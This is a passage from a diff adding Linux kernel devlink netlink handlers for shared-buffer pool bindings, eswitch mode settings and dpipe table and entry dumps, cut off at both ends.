++		}
++	}
++	return 0;
++}
++
++static int devlink_nl_cmd_sb_port_pool_get_dumpit(struct sk_buff *msg,
++						  struct netlink_callback *cb)
++{
++	struct devlink *devlink;
++	struct devlink_sb *devlink_sb;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err = 0;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		if (!devlink->ops->sb_port_pool_get)
++			goto retry;
++
++		devl_lock(devlink);
++		list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
++			err = __sb_port_pool_get_dumpit(msg, start, &idx,
++							devlink, devlink_sb,
++							NETLINK_CB(cb->skb).portid,
++							cb->nlh->nlmsg_seq);
++			if (err == -EOPNOTSUPP) {
++				err = 0;
++			} else if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++		}
++		devl_unlock(devlink);
++retry:
++		devlink_put(devlink);
++	}
++out:
++	if (err != -EMSGSIZE)
++		return err;
++
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int devlink_sb_port_pool_set(struct devlink_port *devlink_port,
++				    unsigned int sb_index, u16 pool_index,
++				    u32 threshold,
++				    struct netlink_ext_ack *extack)
++
++{
++	const struct devlink_ops *ops = devlink_port->devlink->ops;
++
++	if (ops->sb_port_pool_set)
++		return ops->sb_port_pool_set(devlink_port, sb_index,
++					     pool_index, threshold, extack);
++	return -EOPNOTSUPP;
++}
++
++static int devlink_nl_cmd_sb_port_pool_set_doit(struct sk_buff *skb,
++						struct genl_info *info)
++{
++	struct devlink_port *devlink_port = info->user_ptr[1];
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_sb *devlink_sb;
++	u16 pool_index;
++	u32 threshold;
++	int err;
++
++	devlink_sb = devlink_sb_get_from_info(devlink, info);
++	if (IS_ERR(devlink_sb))
++		return PTR_ERR(devlink_sb);
++
++	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
++						  &pool_index);
++	if (err)
++		return err;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_SB_THRESHOLD))
++		return -EINVAL;
++
++	threshold = nla_get_u32(info->attrs[DEVLINK_ATTR_SB_THRESHOLD]);
++	return devlink_sb_port_pool_set(devlink_port, devlink_sb->index,
++					pool_index, threshold, info->extack);
++}
++
++static int
++devlink_nl_sb_tc_pool_bind_fill(struct sk_buff *msg, struct devlink *devlink,
++				struct devlink_port *devlink_port,
++				struct devlink_sb *devlink_sb, u16 tc_index,
++				enum devlink_sb_pool_type pool_type,
++				enum devlink_command cmd,
++				u32 portid, u32 seq, int flags)
++{
++	const struct devlink_ops *ops = devlink->ops;
++	u16 pool_index;
++	u32 threshold;
++	void *hdr;
++	int err;
++
++	err = ops->sb_tc_pool_bind_get(devlink_port, devlink_sb->index,
++				       tc_index, pool_type,
++				       &pool_index, &threshold);
++	if (err)
++		return err;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, devlink_port->index))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_SB_INDEX, devlink_sb->index))
++		goto nla_put_failure;
++	if (nla_put_u16(msg, DEVLINK_ATTR_SB_TC_INDEX, tc_index))
++		goto nla_put_failure;
++	if (nla_put_u8(msg, DEVLINK_ATTR_SB_POOL_TYPE, pool_type))
++		goto nla_put_failure;
++	if (nla_put_u16(msg, DEVLINK_ATTR_SB_POOL_INDEX, pool_index))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_SB_THRESHOLD, threshold))
++		goto nla_put_failure;
++
++	if (ops->sb_occ_tc_port_bind_get) {
++		u32 cur;
++		u32 max;
++
++		err = ops->sb_occ_tc_port_bind_get(devlink_port,
++						   devlink_sb->index,
++						   tc_index, pool_type,
++						   &cur, &max);
++		if (err && err != -EOPNOTSUPP)
++			return err;
++		if (!err) {
++			if (nla_put_u32(msg, DEVLINK_ATTR_SB_OCC_CUR, cur))
++				goto nla_put_failure;
++			if (nla_put_u32(msg, DEVLINK_ATTR_SB_OCC_MAX, max))
++				goto nla_put_failure;
++		}
++	}
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_cmd_sb_tc_pool_bind_get_doit(struct sk_buff *skb,
++						   struct genl_info *info)
++{
++	struct devlink_port *devlink_port = info->user_ptr[1];
++	struct devlink *devlink = devlink_port->devlink;
++	struct devlink_sb *devlink_sb;
++	struct sk_buff *msg;
++	enum devlink_sb_pool_type pool_type;
++	u16 tc_index;
++	int err;
++
++	devlink_sb = devlink_sb_get_from_info(devlink, info);
++	if (IS_ERR(devlink_sb))
++		return PTR_ERR(devlink_sb);
++
++	err = devlink_sb_pool_type_get_from_info(info, &pool_type);
++	if (err)
++		return err;
++
++	err = devlink_sb_tc_index_get_from_info(devlink_sb, info,
++						pool_type, &tc_index);
++	if (err)
++		return err;
++
++	if (!devlink->ops->sb_tc_pool_bind_get)
++		return -EOPNOTSUPP;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_sb_tc_pool_bind_fill(msg, devlink, devlink_port,
++					      devlink_sb, tc_index, pool_type,
++					      DEVLINK_CMD_SB_TC_POOL_BIND_NEW,
++					      info->snd_portid,
++					      info->snd_seq, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int __sb_tc_pool_bind_get_dumpit(struct sk_buff *msg,
++					int start, int *p_idx,
++					struct devlink *devlink,
++					struct devlink_sb *devlink_sb,
++					u32 portid, u32 seq)
++{
++	struct devlink_port *devlink_port;
++	u16 tc_index;
++	int err;
++
++	list_for_each_entry(devlink_port, &devlink->port_list, list) {
++		for (tc_index = 0;
++		     tc_index < devlink_sb->ingress_tc_count; tc_index++) {
++			if (*p_idx < start) {
++				(*p_idx)++;
++				continue;
++			}
++			err = devlink_nl_sb_tc_pool_bind_fill(msg, devlink,
++							      devlink_port,
++							      devlink_sb,
++							      tc_index,
++							      DEVLINK_SB_POOL_TYPE_INGRESS,
++							      DEVLINK_CMD_SB_TC_POOL_BIND_NEW,
++							      portid, seq,
++							      NLM_F_MULTI);
++			if (err)
++				return err;
++			(*p_idx)++;
++		}
++		for (tc_index = 0;
++		     tc_index < devlink_sb->egress_tc_count; tc_index++) {
++			if (*p_idx < start) {
++				(*p_idx)++;
++				continue;
++			}
++			err = devlink_nl_sb_tc_pool_bind_fill(msg, devlink,
++							      devlink_port,
++							      devlink_sb,
++							      tc_index,
++							      DEVLINK_SB_POOL_TYPE_EGRESS,
++							      DEVLINK_CMD_SB_TC_POOL_BIND_NEW,
++							      portid, seq,
++							      NLM_F_MULTI);
++			if (err)
++				return err;
++			(*p_idx)++;
++		}
++	}
++	return 0;
++}
++
++static int
++devlink_nl_cmd_sb_tc_pool_bind_get_dumpit(struct sk_buff *msg,
++					  struct netlink_callback *cb)
++{
++	struct devlink *devlink;
++	struct devlink_sb *devlink_sb;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err = 0;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		if (!devlink->ops->sb_tc_pool_bind_get)
++			goto retry;
++
++		devl_lock(devlink);
++		list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
++			err = __sb_tc_pool_bind_get_dumpit(msg, start, &idx,
++							   devlink,
++							   devlink_sb,
++							   NETLINK_CB(cb->skb).portid,
++							   cb->nlh->nlmsg_seq);
++			if (err == -EOPNOTSUPP) {
++				err = 0;
++			} else if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++		}
++		devl_unlock(devlink);
++retry:
++		devlink_put(devlink);
++	}
++out:
++	if (err != -EMSGSIZE)
++		return err;
++
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int devlink_sb_tc_pool_bind_set(struct devlink_port *devlink_port,
++				       unsigned int sb_index, u16 tc_index,
++				       enum devlink_sb_pool_type pool_type,
++				       u16 pool_index, u32 threshold,
++				       struct netlink_ext_ack *extack)
++
++{
++	const struct devlink_ops *ops = devlink_port->devlink->ops;
++
++	if (ops->sb_tc_pool_bind_set)
++		return ops->sb_tc_pool_bind_set(devlink_port, sb_index,
++						tc_index, pool_type,
++						pool_index, threshold, extack);
++	return -EOPNOTSUPP;
++}
++
++static int devlink_nl_cmd_sb_tc_pool_bind_set_doit(struct sk_buff *skb,
++						   struct genl_info *info)
++{
++	struct devlink_port *devlink_port = info->user_ptr[1];
++	struct devlink *devlink = info->user_ptr[0];
++	enum devlink_sb_pool_type pool_type;
++	struct devlink_sb *devlink_sb;
++	u16 tc_index;
++	u16 pool_index;
++	u32 threshold;
++	int err;
++
++	devlink_sb = devlink_sb_get_from_info(devlink, info);
++	if (IS_ERR(devlink_sb))
++		return PTR_ERR(devlink_sb);
++
++	err = devlink_sb_pool_type_get_from_info(info, &pool_type);
++	if (err)
++		return err;
++
++	err = devlink_sb_tc_index_get_from_info(devlink_sb, info,
++						pool_type, &tc_index);
++	if (err)
++		return err;
++
++	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
++						  &pool_index);
++	if (err)
++		return err;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_SB_THRESHOLD))
++		return -EINVAL;
++
++	threshold = nla_get_u32(info->attrs[DEVLINK_ATTR_SB_THRESHOLD]);
++	return devlink_sb_tc_pool_bind_set(devlink_port, devlink_sb->index,
++					   tc_index, pool_type,
++					   pool_index, threshold, info->extack);
++}
++
++static int devlink_nl_cmd_sb_occ_snapshot_doit(struct sk_buff *skb,
++					       struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	const struct devlink_ops *ops = devlink->ops;
++	struct devlink_sb *devlink_sb;
++
++	devlink_sb = devlink_sb_get_from_info(devlink, info);
++	if (IS_ERR(devlink_sb))
++		return PTR_ERR(devlink_sb);
++
++	if (ops->sb_occ_snapshot)
++		return ops->sb_occ_snapshot(devlink, devlink_sb->index);
++	return -EOPNOTSUPP;
++}
++
++static int devlink_nl_cmd_sb_occ_max_clear_doit(struct sk_buff *skb,
++						struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	const struct devlink_ops *ops = devlink->ops;
++	struct devlink_sb *devlink_sb;
++
++	devlink_sb = devlink_sb_get_from_info(devlink, info);
++	if (IS_ERR(devlink_sb))
++		return PTR_ERR(devlink_sb);
++
++	if (ops->sb_occ_max_clear)
++		return ops->sb_occ_max_clear(devlink, devlink_sb->index);
++	return -EOPNOTSUPP;
++}
++
++static int devlink_nl_eswitch_fill(struct sk_buff *msg, struct devlink *devlink,
++				   enum devlink_command cmd, u32 portid,
++				   u32 seq, int flags)
++{
++	const struct devlink_ops *ops = devlink->ops;
++	enum devlink_eswitch_encap_mode encap_mode;
++	u8 inline_mode;
++	void *hdr;
++	int err = 0;
++	u16 mode;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	err = devlink_nl_put_handle(msg, devlink);
++	if (err)
++		goto nla_put_failure;
++
++	if (ops->eswitch_mode_get) {
++		err = ops->eswitch_mode_get(devlink, &mode);
++		if (err)
++			goto nla_put_failure;
++		err = nla_put_u16(msg, DEVLINK_ATTR_ESWITCH_MODE, mode);
++		if (err)
++			goto nla_put_failure;
++	}
++
++	if (ops->eswitch_inline_mode_get) {
++		err = ops->eswitch_inline_mode_get(devlink, &inline_mode);
++		if (err)
++			goto nla_put_failure;
++		err = nla_put_u8(msg, DEVLINK_ATTR_ESWITCH_INLINE_MODE,
++				 inline_mode);
++		if (err)
++			goto nla_put_failure;
++	}
++
++	if (ops->eswitch_encap_mode_get) {
++		err = ops->eswitch_encap_mode_get(devlink, &encap_mode);
++		if (err)
++			goto nla_put_failure;
++		err = nla_put_u8(msg, DEVLINK_ATTR_ESWITCH_ENCAP_MODE, encap_mode);
++		if (err)
++			goto nla_put_failure;
++	}
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return err;
++}
++
++static int devlink_nl_cmd_eswitch_get_doit(struct sk_buff *skb,
++					   struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct sk_buff *msg;
++	int err;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_eswitch_fill(msg, devlink, DEVLINK_CMD_ESWITCH_GET,
++				      info->snd_portid, info->snd_seq, 0);
++
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int devlink_rate_nodes_check(struct devlink *devlink, u16 mode,
++				    struct netlink_ext_ack *extack)
++{
++	struct devlink_rate *devlink_rate;
++
++	list_for_each_entry(devlink_rate, &devlink->rate_list, list)
++		if (devlink_rate_is_node(devlink_rate)) {
++			NL_SET_ERR_MSG_MOD(extack, "Rate node(s) exists.");
++			return -EBUSY;
++		}
++	return 0;
++}
++
++static int devlink_nl_cmd_eswitch_set_doit(struct sk_buff *skb,
++					   struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	const struct devlink_ops *ops = devlink->ops;
++	enum devlink_eswitch_encap_mode encap_mode;
++	u8 inline_mode;
++	int err = 0;
++	u16 mode;
++
++	if (info->attrs[DEVLINK_ATTR_ESWITCH_MODE]) {
++		if (!ops->eswitch_mode_set)
++			return -EOPNOTSUPP;
++		mode = nla_get_u16(info->attrs[DEVLINK_ATTR_ESWITCH_MODE]);
++		err = devlink_rate_nodes_check(devlink, mode, info->extack);
++		if (err)
++			return err;
++		err = ops->eswitch_mode_set(devlink, mode, info->extack);
++		if (err)
++			return err;
++	}
++
++	if (info->attrs[DEVLINK_ATTR_ESWITCH_INLINE_MODE]) {
++		if (!ops->eswitch_inline_mode_set)
++			return -EOPNOTSUPP;
++		inline_mode = nla_get_u8(
++				info->attrs[DEVLINK_ATTR_ESWITCH_INLINE_MODE]);
++		err = ops->eswitch_inline_mode_set(devlink, inline_mode,
++						   info->extack);
++		if (err)
++			return err;
++	}
++
++	if (info->attrs[DEVLINK_ATTR_ESWITCH_ENCAP_MODE]) {
++		if (!ops->eswitch_encap_mode_set)
++			return -EOPNOTSUPP;
++		encap_mode = nla_get_u8(info->attrs[DEVLINK_ATTR_ESWITCH_ENCAP_MODE]);
++		err = ops->eswitch_encap_mode_set(devlink, encap_mode,
++						  info->extack);
++		if (err)
++			return err;
++	}
++
++	return 0;
++}
++
++int devlink_dpipe_match_put(struct sk_buff *skb,
++			    struct devlink_dpipe_match *match)
++{
++	struct devlink_dpipe_header *header = match->header;
++	struct devlink_dpipe_field *field = &header->fields[match->field_id];
++	struct nlattr *match_attr;
++
++	match_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_MATCH);
++	if (!match_attr)
++		return -EMSGSIZE;
++
++	if (nla_put_u32(skb, DEVLINK_ATTR_DPIPE_MATCH_TYPE, match->type) ||
++	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_INDEX, match->header_index) ||
++	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_ID, header->id) ||
++	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_ID, field->id) ||
++	    nla_put_u8(skb, DEVLINK_ATTR_DPIPE_HEADER_GLOBAL, header->global))
++		goto nla_put_failure;
++
++	nla_nest_end(skb, match_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(skb, match_attr);
++	return -EMSGSIZE;
++}
++EXPORT_SYMBOL_GPL(devlink_dpipe_match_put);
++
++static int devlink_dpipe_matches_put(struct devlink_dpipe_table *table,
++				     struct sk_buff *skb)
++{
++	struct nlattr *matches_attr;
++
++	matches_attr = nla_nest_start_noflag(skb,
++					     DEVLINK_ATTR_DPIPE_TABLE_MATCHES);
++	if (!matches_attr)
++		return -EMSGSIZE;
++
++	if (table->table_ops->matches_dump(table->priv, skb))
++		goto nla_put_failure;
++
++	nla_nest_end(skb, matches_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(skb, matches_attr);
++	return -EMSGSIZE;
++}
++
++int devlink_dpipe_action_put(struct sk_buff *skb,
++			     struct devlink_dpipe_action *action)
++{
++	struct devlink_dpipe_header *header = action->header;
++	struct devlink_dpipe_field *field = &header->fields[action->field_id];
++	struct nlattr *action_attr;
++
++	action_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_ACTION);
++	if (!action_attr)
++		return -EMSGSIZE;
++
++	if (nla_put_u32(skb, DEVLINK_ATTR_DPIPE_ACTION_TYPE, action->type) ||
++	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_INDEX, action->header_index) ||
++	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_ID, header->id) ||
++	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_ID, field->id) ||
++	    nla_put_u8(skb, DEVLINK_ATTR_DPIPE_HEADER_GLOBAL, header->global))
++		goto nla_put_failure;
++
++	nla_nest_end(skb, action_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(skb, action_attr);
++	return -EMSGSIZE;
++}
++EXPORT_SYMBOL_GPL(devlink_dpipe_action_put);
++
++static int devlink_dpipe_actions_put(struct devlink_dpipe_table *table,
++				     struct sk_buff *skb)
++{
++	struct nlattr *actions_attr;
++
++	actions_attr = nla_nest_start_noflag(skb,
++					     DEVLINK_ATTR_DPIPE_TABLE_ACTIONS);
++	if (!actions_attr)
++		return -EMSGSIZE;
++
++	if (table->table_ops->actions_dump(table->priv, skb))
++		goto nla_put_failure;
++
++	nla_nest_end(skb, actions_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(skb, actions_attr);
++	return -EMSGSIZE;
++}
++
++static int devlink_dpipe_table_put(struct sk_buff *skb,
++				   struct devlink_dpipe_table *table)
++{
++	struct nlattr *table_attr;
++	u64 table_size;
++
++	table_size = table->table_ops->size_get(table->priv);
++	table_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_TABLE);
++	if (!table_attr)
++		return -EMSGSIZE;
++
++	if (nla_put_string(skb, DEVLINK_ATTR_DPIPE_TABLE_NAME, table->name) ||
++	    nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_TABLE_SIZE, table_size,
++			      DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++	if (nla_put_u8(skb, DEVLINK_ATTR_DPIPE_TABLE_COUNTERS_ENABLED,
++		       table->counters_enabled))
++		goto nla_put_failure;
++
++	if (table->resource_valid) {
++		if (nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_TABLE_RESOURCE_ID,
++				      table->resource_id, DEVLINK_ATTR_PAD) ||
++		    nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_TABLE_RESOURCE_UNITS,
++				      table->resource_units, DEVLINK_ATTR_PAD))
++			goto nla_put_failure;
++	}
++	if (devlink_dpipe_matches_put(table, skb))
++		goto nla_put_failure;
++
++	if (devlink_dpipe_actions_put(table, skb))
++		goto nla_put_failure;
++
++	nla_nest_end(skb, table_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(skb, table_attr);
++	return -EMSGSIZE;
++}
++
++static int devlink_dpipe_send_and_alloc_skb(struct sk_buff **pskb,
++					    struct genl_info *info)
++{
++	int err;
++
++	if (*pskb) {
++		err = genlmsg_reply(*pskb, info);
++		if (err)
++			return err;
++	}
++	*pskb = genlmsg_new(GENLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!*pskb)
++		return -ENOMEM;
++	return 0;
++}
++
++static int devlink_dpipe_tables_fill(struct genl_info *info,
++				     enum devlink_command cmd, int flags,
++				     struct list_head *dpipe_tables,
++				     const char *table_name)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_dpipe_table *table;
++	struct nlattr *tables_attr;
++	struct sk_buff *skb = NULL;
++	struct nlmsghdr *nlh;
++	bool incomplete;
++	void *hdr;
++	int i;
++	int err;
++
++	table = list_first_entry(dpipe_tables,
++				 struct devlink_dpipe_table, list);
++start_again:
++	err = devlink_dpipe_send_and_alloc_skb(&skb, info);
++	if (err)
++		return err;
++
++	hdr = genlmsg_put(skb, info->snd_portid, info->snd_seq,
++			  &devlink_nl_family, NLM_F_MULTI, cmd);
++	if (!hdr) {
++		nlmsg_free(skb);
++		return -EMSGSIZE;
++	}
++
++	if (devlink_nl_put_handle(skb, devlink))
++		goto nla_put_failure;
++	tables_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_TABLES);
++	if (!tables_attr)
++		goto nla_put_failure;
++
++	i = 0;
++	incomplete = false;
++	list_for_each_entry_from(table, dpipe_tables, list) {
++		if (!table_name) {
++			err = devlink_dpipe_table_put(skb, table);
++			if (err) {
++				if (!i)
++					goto err_table_put;
++				incomplete = true;
++				break;
++			}
++		} else {
++			if (!strcmp(table->name, table_name)) {
++				err = devlink_dpipe_table_put(skb, table);
++				if (err)
++					break;
++			}
++		}
++		i++;
++	}
++
++	nla_nest_end(skb, tables_attr);
++	genlmsg_end(skb, hdr);
++	if (incomplete)
++		goto start_again;
++
++send_done:
++	nlh = nlmsg_put(skb, info->snd_portid, info->snd_seq,
++			NLMSG_DONE, 0, flags | NLM_F_MULTI);
++	if (!nlh) {
++		err = devlink_dpipe_send_and_alloc_skb(&skb, info);
++		if (err)
++			return err;
++		goto send_done;
++	}
++
++	return genlmsg_reply(skb, info);
++
++nla_put_failure:
++	err = -EMSGSIZE;
++err_table_put:
++	nlmsg_free(skb);
++	return err;
++}
++
++static int devlink_nl_cmd_dpipe_table_get(struct sk_buff *skb,
++					  struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	const char *table_name =  NULL;
++
++	if (info->attrs[DEVLINK_ATTR_DPIPE_TABLE_NAME])
++		table_name = nla_data(info->attrs[DEVLINK_ATTR_DPIPE_TABLE_NAME]);
++
++	return devlink_dpipe_tables_fill(info, DEVLINK_CMD_DPIPE_TABLE_GET, 0,
++					 &devlink->dpipe_table_list,
++					 table_name);
++}
++
++static int devlink_dpipe_value_put(struct sk_buff *skb,
++				   struct devlink_dpipe_value *value)
++{
++	if (nla_put(skb, DEVLINK_ATTR_DPIPE_VALUE,
++		    value->value_size, value->value))
++		return -EMSGSIZE;
++	if (value->mask)
++		if (nla_put(skb, DEVLINK_ATTR_DPIPE_VALUE_MASK,
++			    value->value_size, value->mask))
++			return -EMSGSIZE;
++	if (value->mapping_valid)
++		if (nla_put_u32(skb, DEVLINK_ATTR_DPIPE_VALUE_MAPPING,
++				value->mapping_value))
++			return -EMSGSIZE;
++	return 0;
++}
++
++static int devlink_dpipe_action_value_put(struct sk_buff *skb,
++					  struct devlink_dpipe_value *value)
++{
++	if (!value->action)
++		return -EINVAL;
++	if (devlink_dpipe_action_put(skb, value->action))
++		return -EMSGSIZE;
++	if (devlink_dpipe_value_put(skb, value))
++		return -EMSGSIZE;
++	return 0;
++}
++
++static int devlink_dpipe_action_values_put(struct sk_buff *skb,
++					   struct devlink_dpipe_value *values,
++					   unsigned int values_count)
++{
++	struct nlattr *action_attr;
++	int i;
++	int err;
++
++	for (i = 0; i < values_count; i++) {
++		action_attr = nla_nest_start_noflag(skb,
++						    DEVLINK_ATTR_DPIPE_ACTION_VALUE);
++		if (!action_attr)
++			return -EMSGSIZE;
++		err = devlink_dpipe_action_value_put(skb, &values[i]);
++		if (err)
++			goto err_action_value_put;
++		nla_nest_end(skb, action_attr);
++	}
++	return 0;
++
++err_action_value_put:
++	nla_nest_cancel(skb, action_attr);
++	return err;
++}
++
++static int devlink_dpipe_match_value_put(struct sk_buff *skb,
++					 struct devlink_dpipe_value *value)
++{
++	if (!value->match)
++		return -EINVAL;
++	if (devlink_dpipe_match_put(skb, value->match))
++		return -EMSGSIZE;
++	if (devlink_dpipe_value_put(skb, value))
++		return -EMSGSIZE;
++	return 0;
++}
++
++static int devlink_dpipe_match_values_put(struct sk_buff *skb,
++					  struct devlink_dpipe_value *values,
++					  unsigned int values_count)
++{
++	struct nlattr *match_attr;
++	int i;
++	int err;
++
++	for (i = 0; i < values_count; i++) {
++		match_attr = nla_nest_start_noflag(skb,
++						   DEVLINK_ATTR_DPIPE_MATCH_VALUE);
++		if (!match_attr)
++			return -EMSGSIZE;
++		err = devlink_dpipe_match_value_put(skb, &values[i]);
++		if (err)
++			goto err_match_value_put;
++		nla_nest_end(skb, match_attr);
++	}
++	return 0;
++
++err_match_value_put:
++	nla_nest_cancel(skb, match_attr);
++	return err;
++}
++
++static int devlink_dpipe_entry_put(struct sk_buff *skb,
++				   struct devlink_dpipe_entry *entry)
++{
++	struct nlattr *entry_attr, *matches_attr, *actions_attr;
++	int err;
++
++	entry_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_ENTRY);
++	if (!entry_attr)
++		return  -EMSGSIZE;
++
++	if (nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_ENTRY_INDEX, entry->index,
++			      DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++	if (entry->counter_valid)
++		if (nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_ENTRY_COUNTER,
++				      entry->counter, DEVLINK_ATTR_PAD))
++			goto nla_put_failure;
++
++	matches_attr = nla_nest_start_noflag(skb,
++					     DEVLINK_ATTR_DPIPE_ENTRY_MATCH_VALUES);
++	if (!matches_attr)
++		goto nla_put_failure;
++
++	err = devlink_dpipe_match_values_put(skb, entry->match_values,
++					     entry->match_values_count);
++	if (err) {
++		nla_nest_cancel(skb, matches_attr);
++		goto err_match_values_put;
++	}
++	nla_nest_end(skb, matches_attr);
++
++	actions_attr = nla_nest_start_noflag(skb,
++					     DEVLINK_ATTR_DPIPE_ENTRY_ACTION_VALUES);
++	if (!actions_attr)
++		goto nla_put_failure;
++
++	err = devlink_dpipe_action_values_put(skb, entry->action_values,
++					      entry->action_values_count);
++	if (err) {
++		nla_nest_cancel(skb, actions_attr);
++		goto err_action_values_put;
++	}
++	nla_nest_end(skb, actions_attr);
++
++	nla_nest_end(skb, entry_attr);
++	return 0;
++
++nla_put_failure:
++	err = -EMSGSIZE;
++err_match_values_put:
++err_action_values_put:
++	nla_nest_cancel(skb, entry_attr);
++	return err;
++}
++
++static struct devlink_dpipe_table *
++devlink_dpipe_table_find(struct list_head *dpipe_tables,
++			 const char *table_name, struct devlink *devlink)
++{
++	struct devlink_dpipe_table *table;
++	list_for_each_entry_rcu(table, dpipe_tables, list,
++				lockdep_is_held(&devlink->lock)) {
++		if (!strcmp(table->name, table_name))
++			return table;
++	}
++	return NULL;
++}
++
++int devlink_dpipe_entry_ctx_prepare(struct devlink_dpipe_dump_ctx *dump_ctx)
++{
++	struct devlink *devlink;
++	int err;
++
++	err = devlink_dpipe_send_and_alloc_skb(&dump_ctx->skb,
++					       dump_ctx->info);
++	if (err)
++		return err;
++
++	dump_ctx->hdr = genlmsg_put(dump_ctx->skb,
++				    dump_ctx->info->snd_portid,
++				    dump_ctx->info->snd_seq,
++				    &devlink_nl_family, NLM_F_MULTI,
++				    dump_ctx->cmd);
++	if (!dump_ctx->hdr)
++		goto nla_put_failure;
++
++	devlink = dump_ctx->info->user_ptr[0];
++	if (devlink_nl_put_handle(dump_ctx->skb, devlink))
++		goto nla_put_failure;
++	dump_ctx->nest = nla_nest_start_noflag(dump_ctx->skb,
++					       DEVLINK_ATTR_DPIPE_ENTRIES);
++	if (!dump_ctx->nest)
++		goto nla_put_failure;
++	return 0;
++
++nla_put_failure:
++	nlmsg_free(dump_ctx->skb);
++	return -EMSGSIZE;
++}
++EXPORT_SYMBOL_GPL(devlink_dpipe_entry_ctx_prepare);
++
++int devlink_dpipe_entry_ctx_append(struct devlink_dpipe_dump_ctx *dump_ctx,
++				   struct devlink_dpipe_entry *entry)
++{
++	return devlink_dpipe_entry_put(dump_ctx->skb, entry);
++}
++EXPORT_SYMBOL_GPL(devlink_dpipe_entry_ctx_append);
++
++int devlink_dpipe_entry_ctx_close(struct devlink_dpipe_dump_ctx *dump_ctx)
++{
++	nla_nest_end(dump_ctx->skb, dump_ctx->nest);
++	genlmsg_end(dump_ctx->skb, dump_ctx->hdr);
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_dpipe_entry_ctx_close);
++
++void devlink_dpipe_entry_clear(struct devlink_dpipe_entry *entry)
++
++{
++	unsigned int value_count, value_index;
++	struct devlink_dpipe_value *value;
++
++	value = entry->action_values;
++	value_count = entry->action_values_count;
++	for (value_index = 0; value_index < value_count; value_index++) {
++		kfree(value[value_index].value);
++		kfree(value[value_index].mask);
++	}
++
++	value = entry->match_values;
++	value_count = entry->match_values_count;
++	for (value_index = 0; value_index < value_count; value_index++) {
++		kfree(value[value_index].value);
++		kfree(value[value_index].mask);
++	}
++}
++EXPORT_SYMBOL_GPL(devlink_dpipe_entry_clear);
++
++static int devlink_dpipe_entries_fill(struct genl_info *info,
++				      enum devlink_command cmd, int flags,
++				      struct devlink_dpipe_table *table)
++{
++	struct devlink_dpipe_dump_ctx dump_ctx;
++	struct nlmsghdr *nlh;
++	int err;
++
++	dump_ctx.skb = NULL;
++	dump_ctx.cmd = cmd;
++	dump_ctx.info = info;
